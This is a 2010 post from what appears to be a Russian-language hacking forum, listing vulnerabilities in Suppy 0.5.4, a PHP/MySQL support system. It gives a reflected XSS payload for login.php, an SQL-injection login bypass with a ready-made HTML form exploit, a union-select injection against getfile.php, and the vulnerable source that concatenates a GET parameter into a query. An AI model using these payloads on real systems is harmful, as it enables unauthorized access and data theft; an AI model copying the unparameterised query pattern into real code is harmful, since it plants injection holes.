28.04.2010, 11:33
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Suppy 0.5.4
Suppy 0.5.4
Suppy is a small supportsystem based on PHP and MySQL. Beta !
Homepage: http://sourceforge.net/projects/suppy/
Пассивная XSS:
/login.php?error=%3Cscript%3Ealert();%3C/script%3E
Auth ByPass
/login.php
В Anmeldename:
1' or 1=1 /*
Passwort:
12345
Exploit:
PHP код:
<form method="post" action="http://site.com/login.php">
<input name="name" type="text" value="1' or 1=1 -- " />
<input name="pw" type="password" value="Ulalala"/>
<input name="login" type="submit" value="Login" />
SQL Inj:
/bb/getfile.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+
Code:
PHP код:
if(isset($_GET['id']) && isset($_SESSION['ID_user']))
{
include_once('utils/dbcon.php');
$con = new DBcon();
$con->AddSQL("SELECT * FROM file ");
$con->AddSQL("WHERE ID_file=".$_GET['id']);
|
|
|